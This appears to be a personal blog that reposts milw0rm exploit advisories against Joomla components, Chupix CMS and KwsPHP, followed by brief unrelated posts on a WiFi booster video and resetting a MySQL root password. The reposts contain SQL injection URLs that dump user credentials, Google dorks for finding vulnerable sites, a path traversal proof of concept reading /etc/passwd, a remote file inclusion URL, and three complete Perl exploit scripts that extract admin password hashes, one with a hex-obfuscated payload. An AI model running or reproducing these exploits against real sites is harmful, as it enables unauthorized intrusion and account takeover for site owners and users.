X1024mb's other side

Joomla Component joomladate Remote SQL injection

x1024mb — Fri, 06 Jun 2008 07:13:34 +0000

from milw0rm.com

/---------------------------------------------------------------\
\                                				/
/       Joomla Component joomladate Remote SQL injection        \
\                                				/
\---------------------------------------------------------------/

[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:com_joomladate
[*] Dork 2    :  inurl:com_joomladate "user"

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_joomladate&task=viewProfile&user={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_joomladate&task=viewProfile&user=9999999 UNION SELECT user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

----------------------------------------------------------------------------
[*] Greetings :  Str0ke, all friends & muslims HaCkeRs...

# milw0rm.com [2008-06-05]

:: Chupix CMS 0.2.3 (download.php) Remote File Disclosure Vulnerability ::

x1024mb — Sat, 15 Sep 2007 21:32:15 +0000

# Chupix CMS 0.2.3 (download.php) Remote File Download Vulnerability
# P.Script : http://sourceforge.net/project/showfiles.php?group_id=134930
################################download.php################################
Lain:18->57 ->
********************************************************************************************************************
if(isset($_GET['fichier'])){ <--------------XXXX
                                       *
		// téléchargement du fichier
                         *
		$file = "archives/". $_GET['repertoire'] ."/".
$_GET['fichier'];<--------------XXXX                *
		$fichier_txt = "archives/". $_GET['repertoire'] ."/cpt/". $_GET['fichier']
.".php"                 *
		$repertoire = "archives/". $_GET['repertoire'] ."/cpt/";
                         *
		if(is_file($fichier_txt)){
                         *
			$fp           =   @fopen($fichier_txt, "r");  <--------------XXXX
                  *
			$result       =   fread($fp, filesize ($fichier_txt));
                  *
			fclose($fp);
                  *
			$result       =   str_replace("", "", $result);
                  *

                         *
			$num = trim($result);
                  *
		}else{
                         *
			$num = 0;
                  *
		}
                         *
		$num++;
                         *

                         *
		$msg = "";
                         *

                         *
		if(!(is_dir($repertoire))){
                         *
			mkdir ($repertoire, 0755);
                  *
		}
                         *

                         *
		$fp  =   @fopen($fichier_txt, "w+");<--------------XXXX
                         *
	  	if (flock($fp, LOCK_EX)) { // pose un verrou exclusif
                           *
    		fwrite($fp, $msg);
                             *
   			flock($fp, LOCK_UN); // libère le verrou
                     *
		}else{
                         *
    		echo "Impossible de verrouiller le fichier ".
$fichier ."";          *
		}
                         *
   	 	fclose($fp);
                             *

                                   *
                                                           *

                             *

                         *
		header("Content-type: application/force-download");
                         *
		header("Content-Disposition: attachment; filename=".$_GET['fichier']);
                         *
		readfile($file);<--------------XXXX
                         *
}
                                       *
********************************************************************************************************************
# POC:
      /download.php?repertoire=defaut&fichier=../../download.php
      /download.php?fichier=../../../../../../../etc/passwd%00
# Discovered by: GoLd_M
# SP.TanX = Tryag.Com & Asb-May.Net & Milw0rm.Com

Source From Here

# milw0rm.com [2007-09-15]

:: KwsPHP 1.0 (login.php) Remote SQL Injection Exploit ::

x1024mb — Sat, 15 Sep 2007 21:31:28 +0000

###################################################
#  Script..........................: KwsPHP  ver 1.0
#  Script Site..................: http://kws.koogar.org/
#  Vulnerability...............: login.php Remote SQL injection Exploit
#  Access.........................: Remote
#  level.............................: Dangerous
#  Author..........................: S4mi
#  Contact.........................: S4mi[at]LinuxMail.org
####################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39
#
####################################################
# This Exploit  work Only When magic_quotes_gpc Is OFF
#
#Usage  :       C:\Xploit.pl  127.0.0.1  /KswPHP/ admin
#Result Screen Shot :
#+**********************+
# Connecting ...[OK]
# Sending Data ...[OK]
#
#  + Exploit succeed! Getting admin information.
# + ---------------- +
# + Username: admin
# + Password: e10adc3949ba59abbe56e057f20f883e
###################################################

#!/usr/bin/perl

use IO::Socket ;

&header();

&usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));

$host = $ARGV[0];
$path = $ARGV[1];
$user = $ARGV[2];

syswrite STDOUT ,"\n Connecting ...";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "\n Unable to connect to $host\n" unless($sock);

syswrite STDOUT, "[OK]";

$inject = "union%20all%20select%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users%20where%20pseudo='$user'/*&pass=ZAZ&verifer=Se%20Loguer";	

syswrite STDOUT ,"\n Sending Data ...";

print $sock "POST $path/login.php?pseudo=%22$inject HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";

syswrite STDOUT ,"[OK]\n\n";

while($answer = <$sock>){

if ($answer =~ /class="messagelogin">(.*?) /){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ----------------------- +\n";
print "+ Username: $user\n";
print "+ Password: $1\n";
print "+ -------Have Fun--------- +\n";
print "+ You don't need to crack the hash password  \n";
print "+ Just login with ur owen information and edit the cookies\n";
}
}

sub usage{
	print "\nUsage   : perl $0 host /path/ UserName ";
	print "\nExemple : perl $0 www.victim.com /KwsPHP/ admin\n";
	exit(0);
}
sub header(){
print q(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#  Script......................: KwsPHP  ver 1.0
#  Script Site.................: http://kws.koogar.org/
#  Vulnerability...............: Remote SQL injection Exploit
#  Access......................: Remote
#  level.......................: Dangerous
#  Author......................: S4mi
#  Contact.....................: S4mi[at]LinuxMail.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
}

Source From Here

# milw0rm.com [2007-09-15]

:: KwsPHP 1.0 Member_Space Module SQL Injection Exploit ::

x1024mb — Sat, 15 Sep 2007 21:20:55 +0000

#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Cookies;

$host = $ARGV[0];
$User = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;
$port = "80";

 print q(
################################################################
#  Script....................: KwsPHP v1.0 Member_Space Module #
#  Script Site...............: http://kws.koogar.org/          #
#  Vulnerability.............: Remote SQL injection Exploit    #
#  Access....................: Remote                          #
#  level.....................: Dangerous                       #
#  Author....................: S4mi                            #
#  Contact...................: S4mi[at]LinuxMail.org           #
#        This Exploit Work Only When magic_quotes_gpc Is OFF   #
################### (C)oded By S4mi ############################

);

 if (@ARGV < 3) {
 print " #  usage : xpl.pl   host/path/     User Passwd\n";
 print " #    e.g : xpl.pl 127.0.0.1/KwsPHP/ zaz luks\n";
 exit();
 }

   print " [~] User/Password : $User/$passwd \n";
   print " [~] Host : $url \n";

 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new();
 print " [~] Logining ...\n";
 $xpl->cookie_jar( $cookie_jar );
 $login = $xpl->post($url.'index.php',
 Content => [
 "pseudo" => "$User",
 "pass" => "$passwd",
 "submit" => "Se connecter",
 ],); 

$evil0 = "\x39\x39\x39\x39\x39\x27\x2F\x2A\x2A\x2F\x55\x4E\x49\x4F\x4E"
		."\x2F\x2A\x2A\x2F\x53\x45\x4C\x45\x43\x54\x2F\x2A\x2A\x2F\x6E"
		."\x75\x6C\x6C\x2C\x63\x6F\x6E\x63\x61\x74\x28\x63\x68\x61\x72"
		."\x28\x31\x31\x37\x2C\x31\x31\x35\x2C\x31\x30\x31\x2C\x31\x31"
		."\x34\x2C\x31\x31\x30\x2C\x39\x37\x2C\x31\x30\x39\x2C\x31\x30"
		."\x31\x2C\x35\x38\x29\x2C\x70\x73\x65\x75\x64\x6F\x2C\x63\x68"
		."\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x63\x6F\x6E\x63\x61\x74"
		."\x28\x63\x68\x61\x72\x28\x31\x31\x32\x2C\x39\x37\x2C\x31\x31"
		."\x35\x2C\x31\x31\x35\x2C\x31\x31\x39\x2C\x31\x31\x31\x2C\x31"
		."\x31\x34\x2C\x31\x30\x30\x2C\x35\x38\x29\x2C\x70\x61\x73\x73"
		."\x2C\x63\x68\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x6E\x75\x6C"
		."\x6C\x2F\x2A\x2A\x2F\x46\x52\x4F\x4D\x2F\x2A\x2A\x2F\x75\x73"
		."\x65\x72\x73\x2F\x2A\x2A\x2F\x57\x48\x45\x52\x45\x2F\x2A\x2A"
		."\x2F\x69\x64\x3D\x31\x2F\x2A";

$offset = "\x65\x73\x70\x61\x63\x65\x5F\x6D\x65\x6D\x62\x72\x65\x26\x61"
		 ."\x63\x3D\x63\x61\x72\x6E\x65\x74\x26\x61\x63\x74\x3D\x65\x64"
		 ."\x69\x74\x65\x72\x26\x69\x64\x3D";

$target = $xpl->get($url."index.php?mod=$offset$evil0");

if($target->as_string =~ /value="username:(.*?"/) {
$zaz = $1;
print " [+] Exploit succeed! Getting admin information. \n";
print " [+] ------------------------------------------- \n";
}
if($target->as_string =~ /value="password:(.*?"/) {
$luks = $1;
print " [+] UserName : $zaz \n";
print " [+] Password : $luks \n";
}
else {
print " [-] Exploit Failed ! \n";
}
print "\n#############################################################\n";

# milw0rm.com [2007-09-15]

Source From Here

:: KwsPHP 1.0 stats Module Remote SQL Injection Exploit ::

x1024mb — Sat, 15 Sep 2007 21:18:48 +0000

###################################################
#  Script..........................: KwsPHP  ver 1.0 stats Module
#  Script Site..................: http://kws.koogar.org/
#  Vulnerability...............: Remote SQL injection Exploit
#  Access.........................: Remote
#  level.............................: Dangerous
#  Author..........................: S4mi
#  Contact.........................: S4mi[at]LinuxMail.org
####################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39
#
####################################################
# This Exploit Work Only When magic_quotes_gpc Is OFF
#
#Usage  :       C:\Xploit.pl  127.0.0.1  /KswPHP/ admin
#Result Screen Shot :
#+**********************+
# Connecting ...[OK]
# Sending Data ...[OK]
#
#  + Exploit succeed! Getting admin information.
# + ---------------- +
# + Username: admin
# + Password: e10adc3949ba59abbe56e057f20f883e
###################################################
#vuln code : \modules\stats\index.php  line ~ 700 - 720
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# 	elseif(isset($aff) && ($aff=="browser"))
#	{
#	if(isset($typenav))
#	{
#		bloc_head("Statistiques des navigateurs ".$liste_navigateurs[$typenav]);
#
#		$tot_nav=0;
#
#		$requete=reqmysql("SELECT SUM(hit) as tot FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `type` ASC ");
#
#		while ($ligne = mysql_fetch_object($requete))
#		{
#			$tot_nav = $ligne->tot;
#		}
#		$requete=reqmysql("SELECT * FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `hit` DESC");
#	
#########################################################

#!/usr/bin/perl
use IO::Socket ;
&header();
&usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));
$host = $ARGV[0];

$path = $ARGV[1];

$user = $ARGV[2];
syswrite STDOUT ,"\n Connecting ...";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "\n Unable to connect to $host\n" unless($sock);
syswrite STDOUT, "[OK]";
$inject = "9999'/**/UNION/**/SELECT/**/0,0,pass,pseudo/**/FROM/**/users/**/WHERE/**/pseudo='$user'/*";	
syswrite STDOUT ,"\n Sending Data ...";
print $sock "POST $path/index.php?mod=stats&aff=browser&typenav=$inject HTTP/1.1\n";

print $sock "Host: $host\n";

print $sock "Referer: $host\n";

print $sock "Accept-Language: en-us\n";

print $sock "Content-Type: application/x-www-form-urlencoded\n";

print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";

print $sock "Cache-Control: no-cache\n";

print $sock "Connection: Close\n\n";
syswrite STDOUT ,"[OK]\n\n";
while($answer = <$sock>){
if ($answer =~ /nav_(.*?).png/){

print "+ Exploit succeed! Getting admin information.\n";

print "+ ---------------- +\n";

print "+ Username: $user\n";

print "+ Password: $1\n";

print "+ ----Have Fun---- +\n";

print "+ You don't need to crack the hash password  \n";

print "+ Just login with ur owen information and edit the cookies\n";

}

}
sub usage{

	print "\nUsage   : perl $0 host /path/ UserName ";

	print "\nExemple : perl $0 www.victim.com /KwsPHP/ admin\n";

	exit(0);

}

sub header(){

print q(

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#  Script......................: KwsPHP  ver 1.0 stats Module

#  Script Site.................: http://kws.koogar.org/

#  Vulnerability...............: Remote SQL injection Exploit

#  Access......................: Remote

#  level.......................: Dangerous

#  Author......................: S4mi

#  Contact.....................: S4mi[at]LinuxMail.org

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

);

}

Source From Here

# milw0rm.com [2007-09-15]

:: Joomla Component Flash Fun! 1.0 Remote File Inclusion Vuln ::

x1024mb — Sat, 15 Sep 2007 21:13:12 +0000

######################################
# Joomla Flash Fun! Component RFI    #
######################################

Bug in :
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
Variable : $mosConfig_live_site

Dork: "com_joomlaflashfun"

Example:

http://xxx.net/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=[attacker]

Greets to all Irc.RealWorm.Net #Morgan Users

Source From Here

# milw0rm.com [2007-09-15]

:: Make Your Own WiFi-Booster[Extender] ::

x1024mb — Fri, 07 Sep 2007 07:52:37 +0000

You can watch the video from this url : http://youtube.com/w/?v=sUTT8wdN_VA

:: Reset mySql Password ::

x1024mb — Wed, 05 Sep 2007 11:22:11 +0000

taken from : http://www.tech-faq.com/reset-mysql-password.shtml

How to Reset a MySQL Password in 5 Easy Steps

Stop the mysqld daemon process.
Start the mysqld daemon process with the –skip-grant-tables option.
Start the mysql client with the -u root option.
Execute the UPDATE mysql.user SET Password=PASSWORD(‘password’) WHERE User=’root’;
Execute the FLUSH PRIVILEGES; command.

These steps reset the password for the “root” account to “password”. To change the password for a different account, or to set a different password, just edit the variables in single-quotes in step 4. If you know your existing MySQL root password, steps 1-3 are not necessary.

//– just additional information :

- you can use phpMyAdmin with no password setted, and change your root password after that.

- step no.2, you can use this command :

$ /usr/libexec/mysql –skip-grant-tables

:: my Wish ::

x1024mb — Wed, 29 Aug 2007 23:08:19 +0000

my wish is just wanna be a good man, for my everything…

:: Technorati’s link ::

x1024mb — Tue, 28 Aug 2007 16:49:38 +0000